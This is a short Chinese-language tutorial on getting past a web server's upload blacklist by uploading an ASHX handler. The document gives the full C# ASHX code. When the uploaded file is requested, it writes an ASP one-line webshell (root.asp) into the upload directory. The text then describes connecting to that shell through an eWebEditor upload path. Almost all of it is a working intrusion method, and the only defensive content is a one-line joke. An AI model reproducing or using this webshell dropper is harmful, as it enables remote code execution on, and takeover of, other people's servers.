繞過黑名單上傳
突破上傳限制 ashx後綴腳本執行
服務器過濾了asa,cer,cdx,htr,aspx,php,jsp 等腳本
突破的辦法是什麽呢?過濾常見腳本到底該如何突破?
這裏我們還可以添加一個ashx 腳本類型。用ashx來寫一個asp的一句話到當前目錄。
代碼如下。
<%@ WebHandler Language="C#"Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
保存為 ashx ,現在來添加一個 ashx 上傳類型看看.
上傳成功,直接訪問
http://www.xxxxx.com/admin/eWebEditor/UploadFile/201082143554545.ashx就會在當前目錄生成一個root.asp的一句話木馬。
看上傳文件裏,root.asp 已經躺在那邊了,用lake2的 一句話連接,看見親切的hello word !
有時候 網站過濾了常見的腳本類型卻把 ashx給漏了…
安全措施:別漏了ashx。。。
繞過黑名單上傳